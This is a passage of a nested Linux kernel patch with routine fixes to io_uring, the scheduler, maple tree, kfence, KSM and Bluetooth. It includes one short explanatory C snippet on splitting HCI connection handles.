+index 8ba8b5be55675..c1ef5fc60a3cb 100644
+--- a/include/linux/sysfb.h
++++ b/include/linux/sysfb.h
+@@ -70,11 +70,16 @@ static inline void sysfb_disable(void)
+ #ifdef CONFIG_EFI
+ 
+ extern struct efifb_dmi_info efifb_dmi_list[];
+-void sysfb_apply_efi_quirks(struct platform_device *pd);
++void sysfb_apply_efi_quirks(void);
++void sysfb_set_efifb_fwnode(struct platform_device *pd);
+ 
+ #else /* CONFIG_EFI */
+ 
+-static inline void sysfb_apply_efi_quirks(struct platform_device *pd)
++static inline void sysfb_apply_efi_quirks(void)
++{
++}
++
++static inline void sysfb_set_efifb_fwnode(struct platform_device *pd)
+ {
+ }
+ 
+diff --git a/io_uring/filetable.c b/io_uring/filetable.c
+index 68dfc6936aa72..b80614e7d6051 100644
+--- a/io_uring/filetable.c
++++ b/io_uring/filetable.c
+@@ -19,6 +19,9 @@ static int io_file_bitmap_get(struct io_ring_ctx *ctx)
+ 	unsigned long nr = ctx->file_alloc_end;
+ 	int ret;
+ 
++	if (!table->bitmap)
++		return -ENFILE;
++
+ 	do {
+ 		ret = find_next_zero_bit(table->bitmap, nr, table->alloc_hint);
+ 		if (ret != nr)
+diff --git a/io_uring/net.c b/io_uring/net.c
+index 02587f7d5908d..d474cad6abfba 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -47,6 +47,7 @@ struct io_connect {
+ 	struct sockaddr __user		*addr;
+ 	int				addr_len;
+ 	bool				in_progress;
++	bool				seen_econnaborted;
+ };
+ 
+ struct io_sr_msg {
+@@ -1431,7 +1432,7 @@ int io_connect_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 
+ 	conn->addr = u64_to_user_ptr(READ_ONCE(sqe->addr));
+ 	conn->addr_len =  READ_ONCE(sqe->addr2);
+-	conn->in_progress = false;
++	conn->in_progress = conn->seen_econnaborted = false;
+ 	return 0;
+ }
+ 
+@@ -1468,18 +1469,24 @@ int io_connect(struct io_kiocb *req, unsigned int issue_flags)
+ 
+ 	ret = __sys_connect_file(req->file, &io->address,
+ 					connect->addr_len, file_flags);
+-	if ((ret == -EAGAIN || ret == -EINPROGRESS) && force_nonblock) {
++	if ((ret == -EAGAIN || ret == -EINPROGRESS || ret == -ECONNABORTED)
++	    && force_nonblock) {
+ 		if (ret == -EINPROGRESS) {
+ 			connect->in_progress = true;
+-		} else {
+-			if (req_has_async_data(req))
+-				return -EAGAIN;
+-			if (io_alloc_async_data(req)) {
+-				ret = -ENOMEM;
++			return -EAGAIN;
++		}
++		if (ret == -ECONNABORTED) {
++			if (connect->seen_econnaborted)
+ 				goto out;
+-			}
+-			memcpy(req->async_data, &__io, sizeof(__io));
++			connect->seen_econnaborted = true;
++		}
++		if (req_has_async_data(req))
++			return -EAGAIN;
++		if (io_alloc_async_data(req)) {
++			ret = -ENOMEM;
++			goto out;
+ 		}
++		memcpy(req->async_data, &__io, sizeof(__io));
+ 		return -EAGAIN;
+ 	}
+ 	if (ret == -ERESTARTSYS)
+diff --git a/io_uring/rsrc.c b/io_uring/rsrc.c
+index 4cbf3ad725d13..4ccfc29216269 100644
+--- a/io_uring/rsrc.c
++++ b/io_uring/rsrc.c
+@@ -794,6 +794,7 @@ void __io_sqe_files_unregister(struct io_ring_ctx *ctx)
+ 	}
+ #endif
+ 	io_free_file_tables(&ctx->file_table);
++	io_file_table_set_alloc_range(ctx, 0, 0);
+ 	io_rsrc_data_free(ctx->file_data);
+ 	ctx->file_data = NULL;
+ 	ctx->nr_user_files = 0;
+diff --git a/io_uring/uring_cmd.c b/io_uring/uring_cmd.c
+index 2e4c483075d33..9a1dee5718724 100644
+--- a/io_uring/uring_cmd.c
++++ b/io_uring/uring_cmd.c
+@@ -15,12 +15,13 @@
+ static void io_uring_cmd_work(struct io_kiocb *req, bool *locked)
+ {
+ 	struct io_uring_cmd *ioucmd = io_kiocb_to_cmd(req, struct io_uring_cmd);
++	unsigned issue_flags = *locked ? 0 : IO_URING_F_UNLOCKED;
+ 
+-	ioucmd->task_work_cb(ioucmd);
++	ioucmd->task_work_cb(ioucmd, issue_flags);
+ }
+ 
+ void io_uring_cmd_complete_in_task(struct io_uring_cmd *ioucmd,
+-			void (*task_work_cb)(struct io_uring_cmd *))
++			void (*task_work_cb)(struct io_uring_cmd *, unsigned))
+ {
+ 	struct io_kiocb *req = cmd_to_io_kiocb(ioucmd);
+ 
+@@ -42,7 +43,8 @@ static inline void io_req_set_cqe32_extra(struct io_kiocb *req,
+  * Called by consumers of io_uring_cmd, if they originally returned
+  * -EIOCBQUEUED upon receiving the command.
+  */
+-void io_uring_cmd_done(struct io_uring_cmd *ioucmd, ssize_t ret, ssize_t res2)
++void io_uring_cmd_done(struct io_uring_cmd *ioucmd, ssize_t ret, ssize_t res2,
++		       unsigned issue_flags)
+ {
+ 	struct io_kiocb *req = cmd_to_io_kiocb(ioucmd);
+ 
+@@ -56,7 +58,7 @@ void io_uring_cmd_done(struct io_uring_cmd *ioucmd, ssize_t ret, ssize_t res2)
+ 		/* order with io_iopoll_req_issued() checking ->iopoll_complete */
+ 		smp_store_release(&req->iopoll_completed, 1);
+ 	else
+-		io_req_complete_post(req, 0);
++		io_req_complete_post(req, issue_flags);
+ }
+ EXPORT_SYMBOL_GPL(io_uring_cmd_done);
+ 
+diff --git a/kernel/bpf/core.c b/kernel/bpf/core.c
+index f9c3b1033ec39..00d25e8ea9e3c 100644
+--- a/kernel/bpf/core.c
++++ b/kernel/bpf/core.c
+@@ -971,7 +971,7 @@ static int __init bpf_jit_charge_init(void)
+ {
+ 	/* Only used as heuristic here to derive limit. */
+ 	bpf_jit_limit_max = bpf_jit_alloc_exec_limit();
+-	bpf_jit_limit = min_t(u64, round_up(bpf_jit_limit_max >> 2,
++	bpf_jit_limit = min_t(u64, round_up(bpf_jit_limit_max >> 1,
+ 					    PAGE_SIZE), LONG_MAX);
+ 	return 0;
+ }
+diff --git a/kernel/entry/common.c b/kernel/entry/common.c
+index 846add8394c41..be61332c66b54 100644
+--- a/kernel/entry/common.c
++++ b/kernel/entry/common.c
+@@ -21,7 +21,7 @@ static __always_inline void __enter_from_user_mode(struct pt_regs *regs)
+ 	arch_enter_from_user_mode(regs);
+ 	lockdep_hardirqs_off(CALLER_ADDR0);
+ 
+-	CT_WARN_ON(ct_state() != CONTEXT_USER);
++	CT_WARN_ON(__ct_state() != CONTEXT_USER);
+ 	user_exit_irqoff();
+ 
+ 	instrumentation_begin();
+@@ -192,13 +192,14 @@ static unsigned long exit_to_user_mode_loop(struct pt_regs *regs,
+ 
+ static void exit_to_user_mode_prepare(struct pt_regs *regs)
+ {
+-	unsigned long ti_work = read_thread_flags();
++	unsigned long ti_work;
+ 
+ 	lockdep_assert_irqs_disabled();
+ 
+ 	/* Flush pending rcuog wakeup before the last need_resched() check */
+ 	tick_nohz_user_enter_prepare();
+ 
++	ti_work = read_thread_flags();
+ 	if (unlikely(ti_work & EXIT_TO_USER_MODE_WORK))
+ 		ti_work = exit_to_user_mode_loop(regs, ti_work);
+ 
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index 8ae8a5055e205..fad170b475921 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -3872,7 +3872,7 @@ ctx_sched_in(struct perf_event_context *ctx, enum event_type_t event_type)
+ 	if (likely(!ctx->nr_events))
+ 		return;
+ 
+-	if (is_active ^ EVENT_TIME) {
++	if (!(is_active & EVENT_TIME)) {
+ 		/* start ctx time */
+ 		__update_context_time(ctx, false);
+ 		perf_cgroup_set_timestamp(cpuctx);
+@@ -9163,7 +9163,7 @@ static void perf_event_bpf_output(struct perf_event *event, void *data)
+ 
+ 	perf_event_header__init_id(&bpf_event->event_id.header,
+ 				   &sample, event);
+-	ret = perf_output_begin(&handle, data, event,
++	ret = perf_output_begin(&handle, &sample, event,
+ 				bpf_event->event_id.header.size);
+ 	if (ret)
+ 		return;
+diff --git a/kernel/kcsan/Makefile b/kernel/kcsan/Makefile
+index 8cf70f068d92d..a45f3dfc8d141 100644
+--- a/kernel/kcsan/Makefile
++++ b/kernel/kcsan/Makefile
+@@ -16,6 +16,6 @@ obj-y := core.o debugfs.o report.o
+ KCSAN_INSTRUMENT_BARRIERS_selftest.o := y
+ obj-$(CONFIG_KCSAN_SELFTEST) += selftest.o
+ 
+-CFLAGS_kcsan_test.o := $(CFLAGS_KCSAN) -g -fno-omit-frame-pointer
++CFLAGS_kcsan_test.o := $(CFLAGS_KCSAN) -fno-omit-frame-pointer
+ CFLAGS_kcsan_test.o += $(DISABLE_STRUCTLEAK_PLUGIN)
+ obj-$(CONFIG_KCSAN_KUNIT_TEST) += kcsan_test.o
+diff --git a/kernel/sched/core.c b/kernel/sched/core.c
+index 2a4918a1faa9e..9a0698353d60f 100644
+--- a/kernel/sched/core.c
++++ b/kernel/sched/core.c
+@@ -2082,6 +2082,9 @@ static inline void dequeue_task(struct rq *rq, struct task_struct *p, int flags)
+ 
+ void activate_task(struct rq *rq, struct task_struct *p, int flags)
+ {
++	if (task_on_rq_migrating(p))
++		flags |= ENQUEUE_MIGRATED;
++
+ 	enqueue_task(rq, p, flags);
+ 
+ 	p->on_rq = TASK_ON_RQ_QUEUED;
+diff --git a/kernel/sched/fair.c b/kernel/sched/fair.c
+index 0f87369914274..e046a2bff207b 100644
+--- a/kernel/sched/fair.c
++++ b/kernel/sched/fair.c
+@@ -4652,6 +4652,29 @@ static void check_spread(struct cfs_rq *cfs_rq, struct sched_entity *se)
+ #endif
+ }
+ 
++static inline bool entity_is_long_sleeper(struct sched_entity *se)
++{
++	struct cfs_rq *cfs_rq;
++	u64 sleep_time;
++
++	if (se->exec_start == 0)
++		return false;
++
++	cfs_rq = cfs_rq_of(se);
++
++	sleep_time = rq_clock_task(rq_of(cfs_rq));
++
++	/* Happens while migrating because of clock task divergence */
++	if (sleep_time <= se->exec_start)
++		return false;
++
++	sleep_time -= se->exec_start;
++	if (sleep_time > ((1ULL << 63) / scale_load_down(NICE_0_LOAD)))
++		return true;
++
++	return false;
++}
++
+ static void
+ place_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int initial)
+ {
+@@ -4685,8 +4708,29 @@ place_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int initial)
+ 		vruntime -= thresh;
+ 	}
+ 
+-	/* ensure we never gain time by being placed backwards. */
+-	se->vruntime = max_vruntime(se->vruntime, vruntime);
++	/*
++	 * Pull vruntime of the entity being placed to the base level of
++	 * cfs_rq, to prevent boosting it if placed backwards.
++	 * However, min_vruntime can advance much faster than real time, with
++	 * the extreme being when an entity with the minimal weight always runs
++	 * on the cfs_rq. If the waking entity slept for a long time, its
++	 * vruntime difference from min_vruntime may overflow s64 and their
++	 * comparison may get inversed, so ignore the entity's original
++	 * vruntime in that case.
++	 * The maximal vruntime speedup is given by the ratio of normal to
++	 * minimal weight: scale_load_down(NICE_0_LOAD) / MIN_SHARES.
++	 * When placing a migrated waking entity, its exec_start has been set
++	 * from a different rq. In order to take into account a possible
++	 * divergence between new and prev rq's clocks task because of irq and
++	 * stolen time, we take an additional margin.
++	 * So, cutting off on the sleep time of
++	 *     2^63 / scale_load_down(NICE_0_LOAD) ~ 104 days
++	 * should be safe.
++	 */
++	if (entity_is_long_sleeper(se))
++		se->vruntime = vruntime;
++	else
++		se->vruntime = max_vruntime(se->vruntime, vruntime);
+ }
+ 
+ static void check_enqueue_throttle(struct cfs_rq *cfs_rq);
+@@ -4763,6 +4807,9 @@ enqueue_entity(struct cfs_rq *cfs_rq, struct sched_entity *se, int flags)
+ 
+ 	if (flags & ENQUEUE_WAKEUP)
+ 		place_entity(cfs_rq, se, 0);
++	/* Entity has migrated, no longer consider this task hot */
++	if (flags & ENQUEUE_MIGRATED)
++		se->exec_start = 0;
+ 
+ 	check_schedstat_required();
+ 	update_stats_enqueue_fair(cfs_rq, se, flags);
+@@ -7465,9 +7512,6 @@ static void migrate_task_rq_fair(struct task_struct *p, int new_cpu)
+ 	/* Tell new CPU we are migrated */
+ 	se->avg.last_update_time = 0;
+ 
+-	/* We have migrated, no longer consider this task hot */
+-	se->exec_start = 0;
+-
+ 	update_scan_period(p, new_cpu);
+ }
+ 
+diff --git a/kernel/trace/trace_hwlat.c b/kernel/trace/trace_hwlat.c
+index c4945f8adc119..2f37a6e68aa9f 100644
+--- a/kernel/trace/trace_hwlat.c
++++ b/kernel/trace/trace_hwlat.c
+@@ -339,7 +339,7 @@ static void move_to_next_cpu(void)
+ 	cpumask_clear(current_mask);
+ 	cpumask_set_cpu(next_cpu, current_mask);
+ 
+-	sched_setaffinity(0, current_mask);
++	set_cpus_allowed_ptr(current, current_mask);
+ 	return;
+ 
+  change_mode:
+@@ -446,7 +446,7 @@ static int start_single_kthread(struct trace_array *tr)
+ 
+ 	}
+ 
+-	sched_setaffinity(kthread->pid, current_mask);
++	set_cpus_allowed_ptr(kthread, current_mask);
+ 
+ 	kdata->kthread = kthread;
+ 	wake_up_process(kthread);
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 5a976393c9aea..a63594bef72ea 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -5093,35 +5093,21 @@ static inline bool mas_rewind_node(struct ma_state *mas)
+  */
+ static inline bool mas_skip_node(struct ma_state *mas)
+ {
+-	unsigned char slot, slot_count;
+-	unsigned long *pivots;
+-	enum maple_type mt;
++	if (mas_is_err(mas))
++		return false;
+ 
+-	mt = mte_node_type(mas->node);
+-	slot_count = mt_slots[mt] - 1;
+ 	do {
+ 		if (mte_is_root(mas->node)) {
+-			slot = mas->offset;
+-			if (slot > slot_count) {
++			if (mas->offset >= mas_data_end(mas)) {
+ 				mas_set_err(mas, -EBUSY);
+ 				return false;
+ 			}
+ 		} else {
+ 			mas_ascend(mas);
+-			slot = mas->offset;
+-			mt = mte_node_type(mas->node);
+-			slot_count = mt_slots[mt] - 1;
+ 		}
+-	} while (slot > slot_count);
+-
+-	mas->offset = ++slot;
+-	pivots = ma_pivots(mas_mn(mas), mt);
+-	if (slot > 0)
+-		mas->min = pivots[slot - 1] + 1;
+-
+-	if (slot <= slot_count)
+-		mas->max = pivots[slot];
++	} while (mas->offset >= mas_data_end(mas));
+ 
++	mas->offset++;
+ 	return true;
+ }
+ 
+diff --git a/lib/test_maple_tree.c b/lib/test_maple_tree.c
+index ec847bf4dcb4d..f7364b9fee939 100644
+--- a/lib/test_maple_tree.c
++++ b/lib/test_maple_tree.c
+@@ -2602,6 +2602,49 @@ static noinline void check_empty_area_window(struct maple_tree *mt)
+ 	rcu_read_unlock();
+ }
+ 
++static noinline void check_empty_area_fill(struct maple_tree *mt)
++{
++	const unsigned long max = 0x25D78000;
++	unsigned long size;
++	int loop, shift;
++	MA_STATE(mas, mt, 0, 0);
++
++	mt_set_non_kernel(99999);
++	for (shift = 12; shift <= 16; shift++) {
++		loop = 5000;
++		size = 1 << shift;
++		while (loop--) {
++			mas_set(&mas, 0);
++			mas_lock(&mas);
++			MT_BUG_ON(mt, mas_empty_area(&mas, 0, max, size) != 0);
++			MT_BUG_ON(mt, mas.last != mas.index + size - 1);
++			mas_store_gfp(&mas, (void *)size, GFP_KERNEL);
++			mas_unlock(&mas);
++			mas_reset(&mas);
++		}
++	}
++
++	/* No space left. */
++	size = 0x1000;
++	rcu_read_lock();
++	MT_BUG_ON(mt, mas_empty_area(&mas, 0, max, size) != -EBUSY);
++	rcu_read_unlock();
++
++	/* Fill a depth 3 node to the maximum */
++	for (unsigned long i = 629440511; i <= 629440800; i += 6)
++		mtree_store_range(mt, i, i + 5, (void *)i, GFP_KERNEL);
++	/* Make space in the second-last depth 4 node */
++	mtree_erase(mt, 631668735);
++	/* Make space in the last depth 4 node */
++	mtree_erase(mt, 629506047);
++	mas_reset(&mas);
++	/* Search from just after the gap in the second-last depth 4 */
++	rcu_read_lock();
++	MT_BUG_ON(mt, mas_empty_area(&mas, 629506048, 690000000, 0x5000) != 0);
++	rcu_read_unlock();
++	mt_set_non_kernel(0);
++}
++
+ static DEFINE_MTREE(tree);
+ static int maple_tree_seed(void)
+ {
+@@ -2854,6 +2897,11 @@ static int maple_tree_seed(void)
+ 	check_empty_area_window(&tree);
+ 	mtree_destroy(&tree);
+ 
++	mt_init_flags(&tree, MT_FLAGS_ALLOC_RANGE);
++	check_empty_area_fill(&tree);
++	mtree_destroy(&tree);
++
++
+ #if defined(BENCH)
+ skip:
+ #endif
+diff --git a/mm/kfence/Makefile b/mm/kfence/Makefile
+index 0bb95728a7845..2de2a58d11a10 100644
+--- a/mm/kfence/Makefile
++++ b/mm/kfence/Makefile
+@@ -2,5 +2,5 @@
+ 
+ obj-y := core.o report.o
+ 
+-CFLAGS_kfence_test.o := -g -fno-omit-frame-pointer -fno-optimize-sibling-calls
++CFLAGS_kfence_test.o := -fno-omit-frame-pointer -fno-optimize-sibling-calls
+ obj-$(CONFIG_KFENCE_KUNIT_TEST) += kfence_test.o
+diff --git a/mm/kfence/core.c b/mm/kfence/core.c
+index 5349c37a5dac9..79c94ee55f97b 100644
+--- a/mm/kfence/core.c
++++ b/mm/kfence/core.c
+@@ -726,10 +726,14 @@ static const struct seq_operations objects_sops = {
+ };
+ DEFINE_SEQ_ATTRIBUTE(objects);
+ 
+-static int __init kfence_debugfs_init(void)
++static int kfence_debugfs_init(void)
+ {
+-	struct dentry *kfence_dir = debugfs_create_dir("kfence", NULL);
++	struct dentry *kfence_dir;
+ 
++	if (!READ_ONCE(kfence_enabled))
++		return 0;
++
++	kfence_dir = debugfs_create_dir("kfence", NULL);
+ 	debugfs_create_file("stats", 0444, kfence_dir, NULL, &stats_fops);
+ 	debugfs_create_file("objects", 0400, kfence_dir, NULL, &objects_fops);
+ 	return 0;
+@@ -883,6 +887,8 @@ static int kfence_init_late(void)
+ 	}
+ 
+ 	kfence_init_enable();
++	kfence_debugfs_init();
++
+ 	return 0;
+ }
+ 
+diff --git a/mm/ksm.c b/mm/ksm.c
+index addf490da1464..83450d32e109d 100644
+--- a/mm/ksm.c
++++ b/mm/ksm.c
+@@ -988,9 +988,15 @@ static int unmerge_and_remove_all_rmap_items(void)
+ 
+ 		mm = mm_slot->slot.mm;
+ 		mmap_read_lock(mm);
++
++		/*
++		 * Exit right away if mm is exiting to avoid lockdep issue in
++		 * the maple tree
++		 */
++		if (ksm_test_exit(mm))
++			goto mm_exiting;
++
+ 		for_each_vma(vmi, vma) {
+-			if (ksm_test_exit(mm))
+-				break;
+ 			if (!(vma->vm_flags & VM_MERGEABLE) || !vma->anon_vma)
+ 				continue;
+ 			err = unmerge_ksm_pages(vma,
+@@ -999,6 +1005,7 @@ static int unmerge_and_remove_all_rmap_items(void)
+ 				goto error;
+ 		}
+ 
++mm_exiting:
+ 		remove_trailing_rmap_items(&mm_slot->rmap_list);
+ 		mmap_read_unlock(mm);
+ 
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index 3bb3484563eda..dab67b14e178d 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -1391,6 +1391,7 @@ static __always_inline bool free_pages_prepare(struct page *page,
+ 			unsigned int order, bool check_free, fpi_t fpi_flags)
+ {
+ 	int bad = 0;
++	bool skip_kasan_poison = should_skip_kasan_poison(page, fpi_flags);
+ 	bool init = want_init_on_free();
+ 
+ 	VM_BUG_ON_PAGE(PageTail(page), page);
+@@ -1463,7 +1464,7 @@ static __always_inline bool free_pages_prepare(struct page *page,
+ 	 * With hardware tag-based KASAN, memory tags must be set before the
+ 	 * page becomes unavailable via debug_pagealloc or arch_free_page.
+ 	 */
+-	if (!should_skip_kasan_poison(page, fpi_flags)) {
++	if (!skip_kasan_poison) {
+ 		kasan_poison_pages(page, order, init);
+ 
+ 		/* Memory is already initialized if KASAN did it internally. */
+diff --git a/mm/slab.c b/mm/slab.c
+index 29300fc1289a8..ae625e769e5d6 100644
+--- a/mm/slab.c
++++ b/mm/slab.c
+@@ -840,7 +840,7 @@ static int init_cache_node(struct kmem_cache *cachep, int node, gfp_t gfp)
+ 	return 0;
+ }
+ 
+-#if (defined(CONFIG_NUMA) && defined(CONFIG_MEMORY_HOTPLUG)) || defined(CONFIG_SMP)
++#if defined(CONFIG_NUMA) || defined(CONFIG_SMP)
+ /*
+  * Allocates and initializes node for a node on each slab cache, used for
+  * either memory or cpu hotplug.  If memory is being hot-added, the kmem_cache_node
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index b65c3aabcd536..334e308451f53 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2871,10 +2871,25 @@ int hci_recv_frame(struct hci_dev *hdev, struct sk_buff *skb)
+ 		return -ENXIO;
+ 	}
+ 
+-	if (hci_skb_pkt_type(skb) != HCI_EVENT_PKT &&
+-	    hci_skb_pkt_type(skb) != HCI_ACLDATA_PKT &&
+-	    hci_skb_pkt_type(skb) != HCI_SCODATA_PKT &&
+-	    hci_skb_pkt_type(skb) != HCI_ISODATA_PKT) {
++	switch (hci_skb_pkt_type(skb)) {
++	case HCI_EVENT_PKT:
++		break;
++	case HCI_ACLDATA_PKT:
++		/* Detect if ISO packet has been sent as ACL */
++		if (hci_conn_num(hdev, ISO_LINK)) {
++			__u16 handle = __le16_to_cpu(hci_acl_hdr(skb)->handle);
++			__u8 type;
++
++			type = hci_conn_lookup_type(hdev, hci_handle(handle));
++			if (type == ISO_LINK)
++				hci_skb_pkt_type(skb) = HCI_ISODATA_PKT;
++		}
++		break;
++	case HCI_SCODATA_PKT:
++		break;
++	case HCI_ISODATA_PKT:
++		break;
++	default:
+ 		kfree_skb(skb);
+ 		return -EINVAL;
+ 	}
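The ACL-to-ISO detection added above keys off the 12-bit connection handle carried in the ACL header; the upper four bits of the on-wire field hold flags. A standalone sketch of that split (the wire value is hypothetical), mirroring the kernel's hci_handle()/hci_flags() macros:

#include <stdio.h>
#include <stdint.h>

static uint16_t hci_handle(uint16_t h) { return h & 0x0fff; }	/* low 12 bits */
static uint16_t hci_flags(uint16_t h)  { return h >> 12; }	/* top 4 bits */

int main(void)
{
	uint16_t wire = 0x2041;	/* hypothetical handle field off the wire */

	printf("handle=0x%03x flags=0x%x\n", hci_handle(wire), hci_flags(wire));
	return 0;
}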
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 117eedb6f7099..5a6aa1627791b 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -643,6 +643,7 @@ void hci_cmd_sync_clear(struct hci_dev *hdev)
+ 	cancel_work_sync(&hdev->cmd_sync_work);
+ 	cancel_work_sync(&hdev->reenable_adv_work);
+ 
++	mutex_lock(&hdev->cmd_sync_work_lock);
+ 	list_for_each_entry_safe(entry, tmp, &hdev->cmd_sync_work_list, list) {
+ 		if (entry->destroy)
+ 			entry->destroy(hdev, entry->data, -ECANCELED);
+@@ -650,6 +651,7 @@ void hci_cmd_sync_clear(struct hci_dev *hdev)
+ 		list_del(&entry->list);
+ 		kfree(entry);
+ 	}
++	mutex_unlock(&hdev->cmd_sync_work_lock);
+ }
+ 
+ void __hci_cmd_sync_cancel(struct hci_dev *hdev, int err)
+@@ -2367,6 +2369,45 @@ static int hci_resume_advertising_sync(struct hci_dev *hdev)
+ 	return err;
+ }
+ 
++static int hci_pause_addr_resolution(struct hci_dev *hdev)
++{
++	int err;
++
++	if (!use_ll_privacy(hdev))
++		return 0;
++
++	if (!hci_dev_test_flag(hdev, HCI_LL_RPA_RESOLUTION))
++		return 0;
++
++	/* Cannot disable addr resolution if scanning is enabled or
++	 * when initiating an LE connection.
++	 */
++	if (hci_dev_test_flag(hdev, HCI_LE_SCAN) ||
++	    hci_lookup_le_connect(hdev)) {
++		bt_dev_err(hdev, "Command not allowed when scan/LE connect");
++		return -EPERM;
++	}
++
++	/* Cannot disable addr resolution if advertising is enabled. */
++	err = hci_pause_advertising_sync(hdev);
++	if (err) {
++		bt_dev_err(hdev, "Pause advertising failed: %d", err);
++		return err;
++	}
++
++	err = hci_le_set_addr_resolution_enable_sync(hdev, 0x00);
++	if (err)
++		bt_dev_err(hdev, "Unable to disable Address Resolution: %d",
++			   err);
++
++	/* Return if address resolution is disabled and RPA is not used. */
++	if (!err && scan_use_rpa(hdev))
++		return err;
++
++	hci_resume_advertising_sync(hdev);
++	return err;
++}
++
+ struct sk_buff *hci_read_local_oob_data_sync(struct hci_dev *hdev,
+ 					     bool extended, struct sock *sk)
+ {
+@@ -2402,7 +2443,7 @@ static u8 hci_update_accept_list_sync(struct hci_dev *hdev)
+ 	u8 filter_policy;
+ 	int err;
+ 
+-	/* Pause advertising if resolving list can be used as controllers are
++	/* Pause advertising if resolving list can be used as controllers
+ 	 * cannot accept resolving list modifications while advertising.
+ 	 */
+ 	if (use_ll_privacy(hdev)) {
+@@ -3319,6 +3360,7 @@ static const struct hci_init_stage amp_init1[] = {
+ 	HCI_INIT(hci_read_flow_control_mode_sync),
+ 	/* HCI_OP_READ_LOCATION_DATA */
+ 	HCI_INIT(hci_read_location_data_sync),
++	{}
+ };
+ 
+ static int hci_init1_sync(struct hci_dev *hdev)
+@@ -3353,6 +3395,7 @@ static int hci_init1_sync(struct hci_dev *hdev)
+ static const struct hci_init_stage amp_init2[] = {
+ 	/* HCI_OP_READ_LOCAL_FEATURES */
+ 	HCI_INIT(hci_read_local_features_sync),
++	{}
+ };
+ 
+ /* Read Buffer Size (ACL mtu, max pkt, etc.) */
+@@ -5394,27 +5437,12 @@ static int hci_active_scan_sync(struct hci_dev *hdev, uint16_t interval)
+ 
+ 	cancel_interleave_scan(hdev);
+ 
+-	/* Pause advertising since active scanning disables address resolution
+-	 * which advertising depend on in order to generate its RPAs.
+-	 */
+-	if (use_ll_privacy(hdev) && hci_dev_test_flag(hdev, HCI_PRIVACY)) {
+-		err = hci_pause_advertising_sync(hdev);
+-		if (err) {
+-			bt_dev_err(hdev, "pause advertising failed: %d", err);
+-			goto failed;
+-		}
+-	}
+-
+-	/* Disable address resolution while doing active scanning since the
+-	 * accept list shall not be used and all reports shall reach the host
+-	 * anyway.
++	/* Pause address resolution for active scan and stop advertising if
++	 * privacy is enabled.
+ 	 */
+-	err = hci_le_set_addr_resolution_enable_sync(hdev, 0x00);
+-	if (err) {
+-		bt_dev_err(hdev, "Unable to disable Address Resolution: %d",
+-			   err);
++	err = hci_pause_addr_resolution(hdev);
++	if (err)
+ 		goto failed;
+-	}
+ 
+ 	/* All active scans will be done with either a resolvable private
+ 	 * address (when privacy feature has been enabled) or non-resolvable
+diff --git a/net/bluetooth/iso.c b/net/bluetooth/iso.c
+index 24444b502e586..8d136a7301630 100644
+--- a/net/bluetooth/iso.c
++++ b/net/bluetooth/iso.c
+@@ -1620,7 +1620,6 @@ static void iso_disconn_cfm(struct hci_conn *hcon, __u8 reason)
+ void iso_recv(struct hci_conn *hcon, struct sk_buff *skb, u16 flags)
+ {
+ 	struct iso_conn *conn = hcon->iso_data;
+-	struct hci_iso_data_hdr *hdr;
+ 	__u16 pb, ts, len;
+ 
+ 	if (!conn)
+@@ -1642,6 +1641,8 @@ void iso_recv(struct hci_conn *hcon, struct sk_buff *skb, u16 flags)
+ 		}
+ 
+ 		if (ts) {
++			struct hci_iso_ts_data_hdr *hdr;
++
+ 			/* TODO: add timestamp to the packet? */
+ 			hdr = skb_pull_data(skb, HCI_ISO_TS_DATA_HDR_SIZE);
+ 			if (!hdr) {
+@@ -1649,15 +1650,19 @@ void iso_recv(struct hci_conn *hcon, struct sk_buff *skb, u16 flags)
+ 				goto drop;
+ 			}
+ 
++			len = __le16_to_cpu(hdr->slen);
+ 		} else {
++			struct hci_iso_data_hdr *hdr;
++
+ 			hdr = skb_pull_data(skb, HCI_ISO_DATA_HDR_SIZE);
+ 			if (!hdr) {
+ 				BT_ERR("Frame is too short (len %d)", skb->len);
+ 				goto drop;
+ 			}
++
++			len = __le16_to_cpu(hdr->slen);
+ 		}
+ 
+-		len    = __le16_to_cpu(hdr->slen);
+ 		flags  = hci_iso_data_flags(len);
+ 		len    = hci_iso_data_len(len);
+ 
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index adfc3ea06d088..49926f59cc123 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -708,6 +708,17 @@ void l2cap_chan_del(struct l2cap_chan *chan, int err)
+ }
+ EXPORT_SYMBOL_GPL(l2cap_chan_del);
+ 
++static void __l2cap_chan_list_id(struct l2cap_conn *conn, u16 id,
++				 l2cap_chan_func_t func, void *data)
++{
++	struct l2cap_chan *chan, *l;
++
++	list_for_each_entry_safe(chan, l, &conn->chan_l, list) {
++		if (chan->ident == id)
++			func(chan, data);
++	}
++}
++
+ static void __l2cap_chan_list(struct l2cap_conn *conn, l2cap_chan_func_t func,
+ 			      void *data)
+ {
+@@ -775,23 +786,9 @@ static void l2cap_chan_le_connect_reject(struct l2cap_chan *chan)
+ 
+ static void l2cap_chan_ecred_connect_reject(struct l2cap_chan *chan)
+ {
+-	struct l2cap_conn *conn = chan->conn;
+-	struct l2cap_ecred_conn_rsp rsp;
+-	u16 result;
+-
+-	if (test_bit(FLAG_DEFER_SETUP, &chan->flags))
+-		result = L2CAP_CR_LE_AUTHORIZATION;
+-	else
+-		result = L2CAP_CR_LE_BAD_PSM;
+-
+ 	l2cap_state_change(chan, BT_DISCONN);
+ 
+-	memset(&rsp, 0, sizeof(rsp));
+-
+-	rsp.result  = cpu_to_le16(result);
+-
+-	l2cap_send_cmd(conn, chan->ident, L2CAP_LE_CONN_RSP, sizeof(rsp),
+-		       &rsp);
++	__l2cap_ecred_conn_rsp_defer(chan);
+ }
+ 
